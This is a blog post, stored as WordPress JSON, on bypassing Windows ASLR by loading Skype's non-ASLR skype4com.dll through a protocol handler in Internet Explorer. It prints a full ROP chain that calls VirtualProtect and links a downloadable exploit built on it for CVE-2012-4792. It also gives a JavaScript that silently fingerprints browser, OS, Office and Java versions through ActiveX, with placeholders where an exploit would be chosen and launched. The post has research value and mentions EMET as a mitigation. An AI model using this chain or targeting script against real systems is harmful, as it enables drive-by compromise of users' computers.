{"id":641,"date":"2013-02-24T15:02:59","date_gmt":"2013-02-24T14:02:59","guid":{"rendered":"http:\/\/www.greyhathacker.net\/?p=641"},"modified":"2013-03-23T19:48:49","modified_gmt":"2013-03-23T18:48:49","slug":"bypassing-windows-aslr-using-skype4com-protocol-handler","status":"publish","type":"post","link":"https:\/\/www.greyhathacker.net\/?p=641","title":{"rendered":"Bypassing Windows ASLR using “skype4COM” protocol handler"},"content":{"rendered":"

While investigating an unrelated issue using SysInternals Autoruns tool I spotted a couple of protocol handlers installed on the system by Skype. Knowing that protocol handlers can be loaded by Internet Explorer without any prompts I decided to check if these libraries have there dynamic base bits set. It turns out that the “skype4com.dll” library has not which means it could be used to bypass Windows ASLR so I got to work writing my rop chain and testing it out.<\/p>\n

\"\"<\/a><\/p>\n

A quick test to see if it indeed loads up can be done from the code below<\/p>\n

<SCRIPT language=\"JavaScript\">\u00a0 \r\nlocation.href = 'skype4com:'\r\n<\/SCRIPT><\/pre>\n
\"\"<\/a><\/p>\n
Filename - Skype4COM.dll\r\nPath\u00a0\u00a0\u00a0\u00a0 - C:\\Program Files\\Common Files\\Skype\\\r\nMD5 hash - 6e04c50ca4a3fa2cc812cd7ab84eb6d7\r\nSize\u00a0\u00a0\u00a0\u00a0 - 2,156,192 bytes\r\nSigned\u00a0\u00a0 - 03 November 2011 11:46:40\r\nVersion\u00a0 - 1.0.38.0<\/pre>\n
and here is my rop chain without any nulls.<\/p>\n
\u00a00x28025062\u00a0\u00a0 # POP EBX # RETN\r\n\u00a00xa13fcde1\u00a0\u00a0 # 0xA13FCDE1\r\n\u00a00x28024f71\u00a0\u00a0 # POP EAX # RETN\r\n\u00a00x5ec03420\u00a0\u00a0 # 0x5EC03420\r\n\u00a00x28027b5c\u00a0\u00a0 # ADD EBX,EAX # XOR EAX,EAX # RETN (EBX=0x201, 513 bytes)\r\n\u00a00x28024f71\u00a0\u00a0 # POP EAX # RETN\r\n\u00a00xa13fcde1\u00a0\u00a0 # 0xA13FCDE1\r\n\u00a00x280b4654\u00a0\u00a0 # ADD EAX,5EC0325F # RETN\r\n\u00a00x28099a83\u00a0\u00a0 # MOV EDX,EAX # MOV EAX,ESI # POP ESI # RETN (EDX=0x40)\r\n\u00a00x41414141\u00a0\u00a0 # Compensate\r\n\u00a00x28017271\u00a0\u00a0 # POP ECX # RETN\r\n\u00a00x280de198\u00a0\u00a0 # VirtualProtect() pointer [IAT]\r\n\u00a00x28027b5b\u00a0\u00a0 # MOV EAX,DWORD PTR DS:[ECX] # RETN\r\n\u00a00x28041824\u00a0\u00a0 # XCHG EAX,ESI # ADD EAX,48C48300 # RETN 0x08\r\n\u00a00x2806405a\u00a0\u00a0 # POP EBP # RETN\r\n\u00a00x41414141\u00a0\u00a0 # Compensate\r\n\u00a00x41414141\u00a0\u00a0 # Compensate\r\n\u00a00x280bc55b\u00a0\u00a0 # & push esp # ret\u00a0\r\n\u00a00x28017271\u00a0\u00a0 # POP ECX # RETN\r\n\u00a00x28126717\u00a0\u00a0 # &Writable location\r\n\u00a00x28098730\u00a0\u00a0 # POP EDI # RETN\r\n\u00a00x28098731\u00a0\u00a0 # RETN (ROP NOP)\r\n\u00a00x28024f71\u00a0\u00a0 # POP EAX # RETN\r\n\u00a00x90909090\u00a0\u00a0 # nop\r\n\u00a00x28043527\u00a0\u00a0 # PUSHAD # RETN<\/pre>\n
I’ve created an exploit using this rop chain on the “CButton Object Use-After-Free vulnerability” (CVE-2012-4792) taken from Metasploit. It has been tested on Windows 7 Enterprise (32bit) in VM with the latest version of Skype installed (6.2.59.106). The exploit can be downloaded from here<\/a>, the password is “exploit” and the md5 hash of the zip file is 4d5735ff26b769abe1b02f74e2871911<\/p>\n
Mitigation? Well I said it before and I’ll say it again . . . “EMET” your machines ASAP \ud83d\ude42<\/p>\n
On something off topic, I was looking at the html code posted on Pastebin<\/a> for the CVE-2012-4792 exploit and liked the way it checked to see if Office 2010 or 2007 was installed. Some blog posts weren’t as clear as to what the Office check routine was actually doing but really it was just determining which hxds.dll version to use for its rop chain for the Office version it detected. (I haven’t got the actual exploit files to confirm though but I’m pretty sure).<\/p>\n
For Office 2010 it installs 4 OpenDocuments ActiveX objects<\/p>\n
SharePoint.OpenDocuments.4
\nSharePoint.OpenDocuments.3
\nSharePoint.OpenDocuments.2
\nSharePoint.OpenDocuments.1<\/p>\n
and Office 2007 only 3<\/p>\n
SharePoint.OpenDocuments.3
\nSharePoint.OpenDocuments.2
\nSharePoint.OpenDocuments.1<\/p>\n
So basically if the JavaScript is able to load “SharePoint.OpenDocuments.4” then it knows that it’s Office 2010. Since these ActiveX controls can be run without permissions no prompts are given. Below is a simple script that could be used if say in this example checking Windows 7 with IE8 has got installed Office 2007\/2010 or Java 6. No Skype ActiveX controls gets installed that can be run without permissions so I couldn’t work out how to check if Skype is installed without triggering prompts in Internet Explorer. If you do know how to check without triggering prompts please do share.<\/p>\n
<HTML>\r\n<SCRIPT language=\"JavaScript\"> \r\n\/\/\r\n\/\/\r\nif (CheckIEOSVersion() == \"ie8w7\")\r\n{\r\n\u00a0\u00a0 if (CheckOfficeVersion() == \"Office2010\")\r\n\u00a0\u00a0 {\r\n\/\/\u00a0\u00a0\u00a0\u00a0 Exploit call here\r\n\u00a0\u00a0 }\r\n\u00a0\u00a0 else if (CheckOfficeVersion() == \"Office2007\")\r\n\u00a0\u00a0 {\r\n\/\/\u00a0\u00a0\u00a0\u00a0 Exploit call here\r\n\u00a0\u00a0 }\r\n\u00a0\u00a0 else if (JavaVersion() == \"Java6\")\r\n\u00a0\u00a0 {\r\n\/\/\u00a0\u00a0\u00a0\u00a0 Exploit call here\r\n\u00a0\u00a0 }\r\n\u00a0\u00a0 else if (SkypeCheck() == \"\")\r\n\u00a0\u00a0 {\r\n\/\/\u00a0\u00a0\u00a0\u00a0 Exploit call here\r\n\u00a0\u00a0 }\r\n}\r\n\/\/\r\n\/\/\r\nfunction CheckIEOSVersion()\r\n{\r\n\u00a0\u00a0 var agent = navigator.userAgent.toUpperCase();\r\n\u00a0\u00a0 var os_ie_ver = \"\";\r\n\/\/\r\n\u00a0\u00a0 if ((agent.indexOf('NT 5.1') > -1)&&(agent.indexOf('MSIE 7') > -1)) \r\n\u00a0\u00a0\u00a0\u00a0\u00a0 os_ie_ver = \"ie7wxp\";\u00a0 \r\n\u00a0\u00a0 if ((agent.indexOf('NT 5.1') > -1)&&(agent.indexOf('MSIE 8') > -1))\r\n\u00a0\u00a0\u00a0\u00a0\u00a0 os_ie_ver = \"ie8wxp\";\r\n\u00a0\u00a0 if ((agent.indexOf('NT 6.0') > -1)&&(agent.indexOf('MSIE 7') > -1))\r\n\u00a0\u00a0\u00a0\u00a0\u00a0 os_ie_ver = \"ie7wv\";\u00a0\u00a0 \r\n\u00a0\u00a0 if ((agent.indexOf('NT 6.0') > -1)&&(agent.indexOf('MSIE 8') > -1)) \r\n\u00a0\u00a0\u00a0\u00a0\u00a0 os_ie_ver = \"ie8wv\";\r\n\u00a0\u00a0 if ((agent.indexOf('NT 6.1') > -1)&&(agent.indexOf('MSIE 8') > -1)) \r\n\u00a0\u00a0\u00a0\u00a0\u00a0 os_ie_ver = \"ie8w7\";\u00a0\u00a0 \r\n\u00a0\u00a0 if ((agent.indexOf('NT 6.1') > -1)&&(agent.indexOf('MSIE 9') > -1)) \r\n\u00a0\u00a0\u00a0\u00a0\u00a0 os_ie_ver = \"ie9w7\";\r\n\u00a0\u00a0 if ((agent.indexOf('NT 6.2') > -1)&&(agent.indexOf('MSIE 10') > -1)) \r\n\u00a0\u00a0\u00a0\u00a0\u00a0 os_ie_ver = \"ie10w8\";\u00a0\r\n\u00a0\u00a0 return os_ie_ver;\r\n}\r\n\/\/\r\n\/\/\r\nfunction CheckOfficeVersion()\r\n{\r\n\u00a0\u00a0 var offver = \"\";\r\n\u00a0\u00a0 var checka = 0;\r\n\u00a0\u00a0 var checkb = 0;\r\n\/\/\r\n\u00a0\u00a0 try {\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 checka = new ActiveXObject(\"SharePoint.OpenDocuments.4\");\u00a0 \r\n\u00a0\u00a0 } catch (e) {}\r\n\u00a0\u00a0 try {\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 checkb = new ActiveXObject(\"SharePoint.OpenDocuments.3\");\u00a0 \r\n\u00a0\u00a0 } catch (e) {}\r\n\/\/\r\n\u00a0\u00a0 if ((typeof checka) == \"object\" && (typeof checkb) == \"object\")\r\n\u00a0\u00a0\u00a0\u00a0 offver = \"Office2010\";\r\n\u00a0\u00a0 else if ((typeof checka) == \"number\" && (typeof checkb) == \"object\") \r\n\u00a0\u00a0\u00a0\u00a0 offver = \"Office2007\";\r\n\/\/\r\n\u00a0\u00a0 return offver;\r\n}\r\n\/\/\r\n\/\/\r\nfunction JavaVersion() \r\n{\r\n\u00a0\u00a0 var javver = \"\";\r\n\u00a0\u00a0 var javaa = 0;\r\n\/\/\r\n\u00a0\u00a0 try {\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 javaa = new ActiveXObject(\"JavaWebStart.isInstalled.1.6.0.0\");\u00a0 \r\n\u00a0\u00a0 } catch (e) {}\r\n\/\/\r\n\u00a0\u00a0 if ((typeof javaa) == \"object\")\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 javver = \"Java6\";\r\n\/\/\r\n\u00a0\u00a0 return javver;\r\n}\r\n\/\/\r\n\/\/\r\nfunction SkypeCheck()\r\n{\r\n\u00a0\u00a0 var skypever = \"\";\r\n\u00a0\u00a0 return skypever;\r\n}\r\n\/\/\r\n\/\/\r\n<\/SCRIPT>\r\n<\/HTML>\u00a0<\/pre>\n","protected":false},"excerpt":{"rendered":"
While investigating an unrelated issue using SysInternals Autoruns tool I spotted a couple of protocol handlers installed on the system by Skype. Knowing that protocol handlers can be loaded by Internet Explorer without any prompts I decided to check if these libraries have there dynamic base bits set. It turns out that the “skype4com.dll” library […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18,7,6],"tags":[38,32,41,12],"class_list":["post-641","post","type-post","status-publish","format-standard","hentry","category-all","category-exploits","category-vulnerabilities","tag-aslr","tag-rop","tag-skype","tag-uri"],"_links":{"self":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/641","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=641"}],"version-history":[{"count":27,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/641\/revisions"}],"predecessor-version":[{"id":703,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/641\/revisions\/703"}],"wp:attachment":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=641"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}